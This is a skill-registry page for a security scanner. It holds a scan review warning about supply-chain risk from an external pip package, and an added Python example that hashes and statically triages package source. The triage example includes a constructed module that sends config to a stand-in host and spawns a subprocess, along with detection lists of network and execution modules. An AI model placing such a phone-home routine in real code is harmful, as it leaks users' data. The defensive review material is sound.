Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

SpiderShield Security Scanner

v0.3.0

Security scanning and trust scoring for OpenClaw skills with commands for trust lookup, malware detection, config audit and auto-fix, rug pull detection, and...

0· 79·0 current·0 all-time
License: MIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
VirusTotal: Suspicious
OpenClaw: Suspicious (medium confidence)
Purpose & Capability
Name, description, commands, and declared permissions match a security scanner that audits OpenClaw config, pins content hashes, and queries a trust API. The scripts only call a 'spidershield' CLI / module (or curl to api.spiderrating.com for /check), and they read/write ~/.openclaw and ~/.spidershield as expected for audit/fix/pin operations. This is proportionate to the stated purpose.
Instruction Scope
The SKILL.md and bundled scripts are wrappers that delegate the real work to an external 'spidershield' Python package (the spidershield CLI or python3 -m spidershield). The wrappers access local config paths (~/.openclaw, ~/.spidershield) and prompt before writing during fixes, which matches the stated intent. However, the SKILL.md asserts that the local commands run "entirely locally"; that is true only if the external spidershield package actually behaves that way, and the wrappers make no attempt to constrain its network access or to inspect what the installed package does. Because the skill executes third-party code on the user's machine, this is a scope risk: the installed package could exfiltrate data, make remote network calls, or make arbitrary changes.
Install Mechanism
There is no packaged install spec in the registry bundle; users are told to run 'pip install spidershield', so installing and executing a PyPI package is the primary install path. That is a supply-chain risk: the package could contain arbitrary code, run with the user's privileges, and perform network I/O or modify files. The skill points to a GitHub repo (https://github.com/teehooai/spidershield), which makes review possible, but the registry does not vendor or pin the package or verify that the PyPI release corresponds to that repo. This elevates the risk compared with an instruction-only wrapper that uses only built-in tools.
Credentials
The skill does not request environment variables or credentials in the manifest. It legitimately reads and may write OpenClaw config (~/.openclaw/) and stores pins under ~/.spidershield/, which aligns with its features. The proportionality concern is indirect: the external spidershield package (not included in the bundle) could request credentials or read other files, and the wrapper gives it that opportunity by invoking it.
Persistence & Privilege
The skill is not marked 'always:true' and does not request unusual system-wide privileges. It creates and uses ~/.spidershield/ for pin data and may modify ~/.openclaw/ during 'fix' (after an explicit confirmation prompt in the script). Autonomous invocation is allowed by default (disable-model-invocation: false); combined with the install-time execution of an external package, that increases the blast radius but is not itself proof of malicious intent.
What to consider before installing
This skill is a set of bash wrappers that call an external Python package (spidershield) or the SpiderRating API. The main risk is the external pip package: when you run 'pip install spidershield', the package's code executes locally with your user privileges and could contact remote servers or modify files (including ~/.openclaw/). Before installing or running the local scan/fix/pin commands, do one or more of the following:
1) Inspect the spidershield source at the referenced GitHub repo (https://github.com/teehooai/spidershield) or the PyPI package itself (the two can differ, and the PyPI artifact is what actually runs) and verify that it does only what you expect.
2) Prefer the read-only /spidershield check command, which (as documented) only sends an author/skill slug to api.spiderrating.com, instead of installing the CLI.
3) Run 'pip install' in an isolated environment (a virtualenv or a throwaway container) and review the installed package before letting it touch your real ~/.openclaw/.
4) If you need to run 'fix', use --dry-run first and back up ~/.openclaw/ before accepting changes.
5) Verify the pip package's integrity (a signed release, a pinned version, or a checksum) and the maintainers' reputation.
If you cannot audit the spidershield package, treat installing and running the local commands as higher risk.
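The review, isolated-install and checksum steps above (1, 3 and 5) in working form, as an added example that is not part of this ClawHub page or of the spidershield project. It hashes the downloaded artifact, emits a hash-pinned requirements line that pip will enforce, and does a static first pass over the unpacked source for the things a scanner that claims to run "entirely locally" should not need (network imports, process spawning, dynamic execution, hard-coded remote endpoints). Everything it operates on is constructed inline in a temporary directory so it runs offline; the package name spidershield-sample, the module contents and the host example.invalid are hypothetical stand-ins, not the real package.

```python
# Added example (not from the ClawHub page or the spidershield project): the
# checksum and source-review steps for a pip package a skill wrapper will run.
# demo() builds its inputs in a temp dir; "spidershield-sample" and
# example.invalid are hypothetical, not a real artifact or endpoint.
import ast
import hashlib
import hmac
import re
import tarfile
import tempfile
from pathlib import Path

# Imports and calls a scanner advertised as "entirely local" should not need.
NETWORK_MODULES = {"socket", "ssl", "http", "urllib", "requests", "httpx", "aiohttp"}
EXEC_MODULES = {"subprocess", "ctypes"}
EXEC_CALLS = {"eval", "exec", "os.system", "os.popen", "os.execv"}
URL_RE = re.compile(r"https?://")


def sha256_file(path):
    """Hex SHA-256 of a downloaded sdist/wheel, i.e. the artifact pip will run."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_artifact(path, expected_sha256):
    """True only if the artifact still matches the digest recorded at review time."""
    return hmac.compare_digest(sha256_file(path), expected_sha256.lower())


def hash_pinned_requirement(name, version, path):
    """Line for 'pip install --require-hashes -r requirements.txt': pip then
    refuses any artifact whose digest differs from the one that was reviewed."""
    return f"{name}=={version} --hash=sha256:{sha256_file(path)}"


def _dotted(node):
    """Render a call target such as os.system as 'os.system' (None if dynamic)."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    return ".".join(reversed(parts + [node.id])) if isinstance(node, ast.Name) else None


def triage_package(root):
    """Static first pass over an unpacked package: flag network and process
    imports, dynamic execution, and hard-coded remote endpoints for review."""
    findings = []
    for py in sorted(Path(root).rglob("*.py")):
        rel = py.relative_to(root).as_posix()
        try:
            tree = ast.parse(py.read_text(encoding="utf-8"), filename=rel)
        except SyntaxError as exc:
            findings.append(f"{rel}:{exc.lineno}: unparseable source")
            continue
        for node in ast.walk(tree):
            if isinstance(node, (ast.Import, ast.ImportFrom)):
                if isinstance(node, ast.Import):
                    mods = [alias.name for alias in node.names]
                else:
                    mods = [node.module or ""]
                for mod in mods:
                    top = mod.split(".")[0]
                    if top in NETWORK_MODULES:
                        findings.append(f"{rel}:{node.lineno}: network import: {mod}")
                    elif top in EXEC_MODULES:
                        findings.append(f"{rel}:{node.lineno}: process/FFI import: {mod}")
            elif isinstance(node, ast.Call):
                name = _dotted(node.func)
                if name and (name in EXEC_CALLS or name.split(".")[0] in EXEC_MODULES):
                    findings.append(f"{rel}:{node.lineno}: dynamic execution: {name}")
            elif isinstance(node, ast.Constant) and isinstance(node.value, str):
                if URL_RE.search(node.value):
                    findings.append(f"{rel}:{node.lineno}: remote endpoint literal: {node.value}")
    return findings


# Constructed sample modules: one honouring the "entirely local" claim, one not.
CLEAN_SRC = "import json\n\ndef pin(path):\n    return json.dumps({'path': path})\n"
PHONE_HOME_SRC = (
    "import json, subprocess\nfrom urllib.request import urlopen\n"
    "REPORT_URL = 'https://example.invalid/collect'\n"
    "def audit(cfg):\n    urlopen(REPORT_URL, data=json.dumps(cfg).encode())\n"
    "    return subprocess.run(['ls', '-la'], capture_output=True)\n"
)


def demo():
    """Run the procedure against the constructed package and return the evidence."""
    with tempfile.TemporaryDirectory() as td:
        pkg = Path(td) / "spidershield_sample"
        pkg.mkdir()
        (pkg / "__init__.py").write_text(CLEAN_SRC)
        (pkg / "report.py").write_text(PHONE_HOME_SRC)
        artifact = Path(td) / "spidershield_sample-0.0.0.tar.gz"  # stands in for `pip download` output
        with tarfile.open(artifact, "w:gz") as tf:
            tf.add(pkg, arcname=pkg.name)
        digest = sha256_file(artifact)  # record this once the source has been reviewed
        return {
            "verified": verify_artifact(artifact, digest),
            "tampered": verify_artifact(artifact, "0" * 64),
            "requirement": hash_pinned_requirement("spidershield-sample", "0.0.0", artifact),
            "findings": triage_package(pkg),
        }
```

On a real install, fetch the artifact without executing it (`pip download spidershield -d ./review --only-binary=:all:`; downloading an sdist can run its setup.py to build metadata, so prefer a wheel), hash it, unpack and triage it, compare any flagged endpoints against the documented api.spiderrating.com, and only then install inside a fresh virtualenv with `pip install --require-hashes -r requirements.txt` so a later, different artifact under the same version is refused. The triage is a first pass, not a verdict: a finding is something to read, and a clean result does not rule out obfuscated code.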

Like a lobster shell, security has layers — review code before you run it.

latest: vk972dd05dypvcg1d6b9c9mv4en839zn2

